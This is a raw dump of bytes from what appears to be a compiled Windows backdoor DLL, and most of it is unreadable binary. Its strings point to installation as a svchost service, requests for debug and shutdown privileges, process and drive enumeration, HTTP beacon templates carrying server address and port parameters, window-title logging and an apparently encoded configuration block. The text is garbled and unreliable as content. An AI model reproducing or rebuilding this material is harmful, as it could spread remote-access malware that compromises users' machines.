GetComputerNameA  �GlobalMemoryStatus  �GetSystemInfo �ResumeThread  QTerminateProcess  �GetVersionExA �GetVersion  �QueryPerformanceCounter �QueryPerformanceFrequency 8SetThreadPriority &SetPriorityClass  �GetThreadPriority �GetPriorityClass  :GetCurrentProcess �ReadFile  SetFilePointerEx  \GetFileSizeEx Z CreateMutexA  I CreateEventA  �GlobalFree  �ReleaseMutex  �ResetEvent  �WaitForMultipleObjects  �lstrcpyW  �GlobalLock  �GlobalAlloc [GetFileSize zOpenMutexA  sOpenEventA  �lstrcatW  �lstrlenW  � FlushFileBuffers  SetFilePointer  �WideCharToMultiByte �SearchPathA uGetModuleFileNameA  |OpenProcess E CreateDirectoryA  dMoveFileA KGetDriveTypeA �GetVolumeInformationA FGetDiskFreeSpaceExA nGetLogicalDriveStringsA WGetFileAttributesExA  � FindClose iGetLastError  � FindNextFileA �lstrcmpA  � FindFirstFileA  �lstrcmpiA �Process32Next �Process32First  l CreateToolhelp32Snapshot  � DuplicateHandle ,SetStdHandle  _ CreatePipe  �GetStdHandle  � ExitProcess GetCommandLineA �GetProcAddress  � FreeLibrary NLocalAlloc  InterlockedExchange �RaiseException  HLoadLibraryA  KERNEL32.dll                  �!G    F\          (\ 4\ @\ �% `# �# Q\ \\ f\     NNNNNN.dll DoMainWork DoService ServiceMain                                                                                                                                                                                                                                                                                                                                                                                                                   p!                        Start   SYSTEM\CurrentControlSet\Services\  SYSTEM\ControlSet001\Services\  gdiplus.dll  myparentthreadid=%d;myguid=%s  ����    ��ʾ    ����    pass    name    port    %s%08x.ini  \   \\.\%s  SeShutdownPrivilege http://%s   %d.exe  Cache-Control: no-cache

 Connection: Keep-Alive
    Proxy-Connection: Keep-Alive
  Host: %s:%d
   Host: %s
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
 Accept: */*
   GET / HTTP/1.1
    GET %s HTTP/1.1
   :   200 OK
    Content-Length  Content-Length: %d
    POST /%s HTTP/1.1
 POST http://%s:%d/%s HTTP/1.1
 POST http://%s/%s HTTP/1.1
    %04d%02d%02d/%02d%02d%02d/%d.jsp    %d%d.exe    mythreadid=%d;myserveraddr=%s;myserverport=%d   DISPLAY i m a g e / g i f   i m a g e / j p e g     Winlogon    Global\%s-key-metux Global\%s-key-event  
     [ < = ]     
     (u7b�[x�    S_MR(u7b�     Default 
%s %s %s
    [%04d-%02d-%02d %02d:%02d:%02d]  
 * * * �NN:N�|�~{vU_^�S�T�[x[ % 0 4 d - % 0 2 d - % 0 2 d   % 0 2 d : % 0 2 d : % 0 2 d ] * * *  
   http    ProxyServer Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable .exe    SOFTWARE\Classes\HTTP\shell\open\command    %s= SeDebugPrivilege    \svchost.exe -k     ServiceDll  Description SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost    %s%s%s%s    %s%s%s%s\Parameters \Services\  ControlSet003   ControlSet002   ControlSet001   CurrentControlSet   SYSTEM\ %SystemRoot%\System32   %08x.tmp    %s\ %s\%s   ..  .   %s\*.*  *.* *   Default IME M   SYSTEM\ControlSet001\Services\%s    %u  WinSta0 myserverport    myserveraddr    mythreadid  )():)L)^)p)�)�)�)�)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            �   �0G12A2�2�2�3�3�3�3�3�34484U4}4�4�4�4�4565<5I5[5b5�5�5�5�5�5�5�5 66&6�6f768�8�9�:9;N;T;a;x;�;q<�<�<=(=>=M=e=t=�=�=�=l>1?I?O?o?�?�?�?�?�?   0  �   �0�0�0�0�0�0�0�0�01
1111 1&1+11161=1�1(2.2A2G2Z2`2s2y2�2�2�2�2�2�2�2�2�2�23	333x3|3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�314H4�4�4�4B5L5k5�5�56#6�6�6�6727�7�7_8�8�9�9�9�9:(:5:D:�:�:C;O;W;r;�;�;�;�;�;< =-=G=�=�=A>N>�>?+?H?�?�?   @  �   N0�0�0�0�011#1-151;1�1�1�1�1�1�1 222212>2L2a2n2|2�2�2�2�2�2�2�2�2�2�203F3L3R3\3h3�3�3�45J5�5�577\7'9L9::":3:M:a:n<�<9=f=�=�=V>\>�>�>�>�>!?+?<?F?N?X?]?g?�?�?�?�?�?�?�?�?�?   P  H   000%0/0;0@0J0�0�0�0�0�0�0111 1&1�1j23I4&5�688V9�<�<==�>   `  �   A0G0N0T0^0j0�0s2�2�23 383v3�3�3�3�3Y4i4�4�4�4�4�4�455f5�5�5�5U6�6�6�6 7!7'7/747:7L7n7�7�78x88�8�8�8v9�9�9::(:6:L:w:�:�:�:�:�:;�;\<c<l<s<�<�<�<�<�<�<�<===$= >>J>�>�> p  �   #0F0�0�0%1-2�2�23&3�3�3�3�4�4C5v5�5�6�6V7v7�7�7w8�8�8�8�9�9�9�:=;D;V;i;t;z;�;�;�;�;�;�;�;<�<�<`=>>H>U>f>�>�>�>�>�?   �  |   N0^0w0�0�0B1I1^1q1|1�1�1�1�233P3�3S4�4�416K6}6�6�6�6W7�7�7�7�7k8}8�8�8�8�899$9-9�9	<<#<)<=<C<Y<t<Q=X=j=}=�>�>}?�? �  4  c0�0�0�0�1�1�1�1�1
2!2+2�2�2�2E3j3�3�3�4�4�45 5%525I5h5}5�5�5�5�546A6F6L6V6�6�6k7q7|7�7�7�7�7�7R8_8j8x8�8�8�8�8�8�8�89B9H9W9\9b9�9�9�9�9�9�9�9�9�9!:(:�:�:�:�:>;E;K;T;[;a;j;q;w;;�;�;�;�;�;�;�;<<< <&</<6<G<M<`<f<q<w<<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<_=|=�=�=�=)>;>�>�>�>?+?E?L?^?e?�?�?�?�?�?�?�?   �  �   0
00(0.050;0B0�0�0�0�0�0�011O1V1c1j1r1y1�1�1�1�1�1�1�1�1�1�1�12-2:2�2�2�2�2�2�2�3�364C4�4�4M5�5�5�56!6e6j6�6�6�6 77:7I7\7�7�7�7�7_8�9�9[;`;z;;�;�;�;A<H<g<�<�<�<z=�=�=�=�=�=�=�>�>?7?�?�?   �  �   0O0V0_0g0�0�1�1�1M2i2�2�23�3�3�3"4@4S4c4m4w4�4+505=5N5�5�5�5616D6R6\6f6�6#707P7Z7g7�7888�8�8�8	99)9�9�9�9�9&:9:�:�:�:�:�:�:
;;!;-;:;W;c;o;{;�;�;�;�;�;�;�;�;<(<5<A<�<�<�<�<0===t=�=�=�=
>>\>i>�>�>�>[?a?g?w?�?�?�? �  �   T0;1~2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�243:3�3�3K4�4U5�5�5J6o6�6�677�8�8_9q9�9�9":�:�:�:;C;�;�;�;�;�;�;�;<!<.<�<�<�=�=�>�>�>(?g?t?�?�?�?�? �  �   P0Z0r0�0�0f1�1�1�1�172D2Q2^2y2�2�2�2�2�2,3@3P3|3�3�3�3�3�34I4S4n4�45P5s5J6�6�6�6(7g7t7}7�7�7�788'8:8�8�8G9�9�9�9�9	::#:0:=:J:�:�:9;@;R;e;n;t;~;�;�;�;�;<;<W<<�<�<^=�=�=<>�>�>�>�>?Y?o?�?�?�? �  �   
0A0T0�0�0�0�0�031^1q1�1�1
22s2�2�2�2�2�2T3�3�3�4�4505R5�5 6L6b6x6�6�6�6�6�6h7v7�78L8_8u8�89!979�9�9�9�9:�:�:�;�;<E<�<�<&=c=~=e>�>?%?n?x?�?�? �  �   0�0�0�1�1�2�2
3�3'4V4f4q4�45"5m5�5�5�5�5�5�56$646�6�6�6'7e7u7�7�7�7�7�7-8\8l8�8�8�8�8[9a9o9u9�9�9:-:_:y:�:�:�:�:S;o;�;�;�;�;�;S<m<�<�<�<�<�<�< =='=�=�=�=>=>\>�>�>?6?{?�?�?�?�?�?   l   ]0t0)23k3�3)5f5�5�5�5�68=8h8�8�8909�9�9�:;_;�;�;<S<a<r<�<�<
==N=f=�=�=>)>f>�>�>�>?B?e?�?�?�?  �   0S0�0�0�0 1W1�1�1�162\2�2�23F3u3�3M4o4�4�45)5N5T5k5q5�5�5�5�5r6�6�6�6�6C7N7T7�7�78�8�8�9<G<g<�<�<�=>>'>->C>c>�>�>�>�>�>C?c?}?�?�?�?�?�?�?   �  0&040;0U0t0�0A1I1�1�1�1�1�1�12
2222�2�2�2�2�2�2�2�2�2E3�3�344%4+4>4U4g4z4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�45B5I5P5W5\5h5s5�5�5�5�5�5�5 6
666(626;6H6M6S6X6^6t6�67e7k7�7�7�7�7�7�7878E8_8�8�8�8�8999$9+969=9H9O9Z9a9l9s9~9�9�9�9�9�9�9�9�95:W:r:~:�:�:�:�:�:�:�:�:U;a;i;�;�;�;�;�;�; <<<<<�<	===B=J=P=[=h=p=~=�=�=�=�=�=�=�=�=�=�=
>f>�>�>�>�>�>�>�>�>?-?M?m?�?�?�?�?   0 $   
0-0M0m0�0�0�0�01O11�1�1�1 @ �   �3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�34 4<4H4d4p4�4�4�4�4�4�455,585T5`5|5�5�5�5�5�5�5 66(6D6P6l6x6�6�6�6�6�6�6�67 7<7D7P7l7t7�7�7�7�7�7�7�7�7 888888<8@8D8H8L8P8T8X8\8 `     0�6�6�6�6�6�6�6�6�6�6                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              B52�hzs|u#+%'<k$$<q}eee<xwew~~e}`~v<q}=p q =d{b<xbu������kkqkfweykqkf_{q`}a}tf2<\WF2T`swe}`y2FB_ykqkf�ͮ�ź��I ""%#" $O��ߺ�ߩ���d��kyU� /��=�Q(NE[\V]EANakafw! Nfdvtw<YWKQ(NE[\V]EANakafw! Nfdvtw<v~~Q(NE[\V]EANFW_BN*$$*+'$ # #"%$<wjwQ(NE[\V]EANakafw! Nv`{dw`aNfdvtw<akaQ(NE[\V]EANakafw! Nfdvtw<b`}Q(NE[\V]EANakafw! Nfdvtw<aq}Q(NE[\V]EANakafw! Nfdvtw<wjw